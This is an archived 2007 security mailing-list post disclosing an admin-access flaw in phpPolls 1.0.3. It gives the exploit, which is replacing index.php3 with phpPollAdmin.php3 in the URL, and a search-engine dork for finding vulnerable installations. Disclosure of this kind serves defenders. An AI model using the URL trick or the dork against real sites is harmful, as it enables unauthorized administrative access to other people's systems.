phpPolls 1.0.3 (acces to sensitive file) Feb 11 2007 12:45AM
sn0oPy team gmail com
* phpPolls 1.0.3 (acces to sensitive file)

* By : sn0oPy

* Risk : medium

* exploit :

Replace http://www.target.ma/phpPolls/index.php3
by
http://www.target.ma/phpPolls/phpPollAdmin.php3

* dork : inurl:"phpPolls/"

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* Site : http://forums.avenir-geopolitique.net

* greetz : [subzero], Avg Team.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus